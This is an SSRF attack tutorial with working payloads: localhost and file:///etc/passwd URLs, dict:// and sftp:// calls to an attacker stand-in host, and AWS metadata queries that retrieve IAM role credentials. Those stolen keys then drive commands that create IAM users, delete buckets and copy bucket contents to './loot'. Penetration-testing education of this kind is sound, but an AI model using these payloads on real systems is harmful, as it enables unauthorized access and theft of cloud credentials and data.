Server-side request forgery

In this section, I will explain what server-side request forgery is, describe some common examples, and show how to find and exploit various kinds of SSRF vulnerabilities.

Server-side request forgery (SSRF) exploits the trust relationship between a web server and other back-end systems that are not normally accessible to an attacker (e.g. because of firewalls or application rules). SSRF vulnerabilities are particularly dangerous in cloud infrastructure such as AWS, because they allow an attacker to query internal services like Amazon's instance metadata API for credentials and other sensitive data.

Techniques

Basic

Generally, you'll be looking for poorly sanitized parameters that accept URLs, in either GET or POST requests. Less well-known injection points for SSRF include:

  • HTTP Referer header (see the example below)

  • Partial URLs in requests (assembled server-side)

In the examples below, localhost is used in the URL to access data and services which are only accessible via the local network.

Example GET request with an unsanitized url parameter (for instance, one intended for an open redirect):

http://[host]/page?url=http://localhost/api/getuser/id/1

Example POST request with a similarly unsanitized URL parameter:

POST /page HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

url=http://localhost:1234
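
The Referer header mentioned above can be probed in the same way. A minimal curl sketch (the internal path /admin is just an illustrative guess at something worth reaching):

# Supply an internal URL in the Referer header and compare the response
# (or response time) against a normal request.
curl "http://[host]/page" -H "Referer: http://localhost/admin"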

Some SSRF attacks return a response that you can see in the vulnerable application's output, but others are blind: the request is sent, but you never see the result directly.
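
To detect blind SSRF, point the URL parameter at a host you control and watch for an inbound connection. A minimal sketch (the port and callback path are arbitrary):

# On a machine you control, start a throwaway HTTP listener:
python3 -m http.server 8000

# Then trigger the suspected SSRF and watch the listener's log for a hit:
curl "http://[host]/page?url=http://[your-host]:8000/callback"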

You can also test protocols other than HTTP:

http://[host]/page.php?url=file:///etc/passwd
http://[host]/page.php?url=dict://[evilhost]:1234/
http://[host]/page.php?url=sftp://[evilhost]:1234/
http://[host]/page.php?url=ldap://localhost:1234/%0astats%0aquit

Attacking AWS with SSRF

AWS provides an internal instance metadata service that can be queried from any EC2 instance. An attacker who can reach it through an SSRF vulnerability can retrieve instance information and, using the credentials it exposes, in some cases make changes to the infrastructure (for example with the AWS CLI, as shown later in this section).

There are two versions of the instance metadata service: the newer IMDSv2 requires you to generate a short-lived session token before issuing requests, while the older IMDSv1 does not. IMDSv1 is still enabled on many instances, so you can often retrieve the same data with a plain, token-less request to http://169.254.169.254.
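
For example, when IMDSv1 is enabled, the top-level metadata listing can be fetched with a single unauthenticated request:

# No token required on instances that still allow IMDSv1
curl http://169.254.169.254/latest/meta-data/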

The following command from Amazon's metadata documentation allows you to generate a 6-hour token, save it in a variable and display the top-level metadata items:

TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` \
&& curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/

The top-level metadata items will look something like this:

ami-id
ami-launch-index
...
public-keys/
security-groups

From there, you can make calls to the API to view each of the metadata items in detail.

For example, the following command lets you view the instance's user data (often startup scripts), which may reveal credentials or paths to sensitive S3 buckets:

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/

To view roles for the instance:

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/

Once you have a role name, you can request credentials for that role:

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/SomeRole

{
  "Code" : "Success",
  "LastUpdated" : "2019-12-03T18:08:16Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "V...",
  "Token" : "SomeBase64==",
  "Expiration" : "2019-12-04T00:17:43Z"
}
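
The credentials above can be fed straight to the AWS CLI. A minimal sketch; because these are temporary role credentials, the session token must be set alongside the key pair (the values are the ones returned by the metadata service):

# Use the stolen role credentials for subsequent AWS CLI commands
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=V...
export AWS_SESSION_TOKEN=SomeBase64==

# Confirm the credentials work and see which identity/role you are acting as
aws sts get-caller-identity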

At this point you may want to consider an automated AWS enumeration and exploitation tool such as Nimbostratus to determine the permissions available to the role:

sudo python nimbostratus dump-permissions --access-key=ASIA... --secret-key=V...

You can also attempt to create a new user, as a proof-of-concept:

sudo python nimbostratus create-iam-user --access-key=ASIA... --secret-key=p...

Enumerating S3 buckets

The AWS CLI can be used to explore any S3 buckets the stolen credentials can reach. Some useful commands:

aws s3 mb s3://bucket-name            # create a bucket
aws s3 ls                             # list buckets
aws s3 ls s3://bucket-name            # list things in a bucket
aws s3 rb s3://bucket-name --force    # delete bucket + contents
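
If the listing reveals interesting objects, the same CLI can pull them down; for example (the object name and local destination paths are arbitrary):

aws s3 cp s3://bucket-name/some-object .    # download a single object
aws s3 sync s3://bucket-name ./loot         # mirror the whole bucket locally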

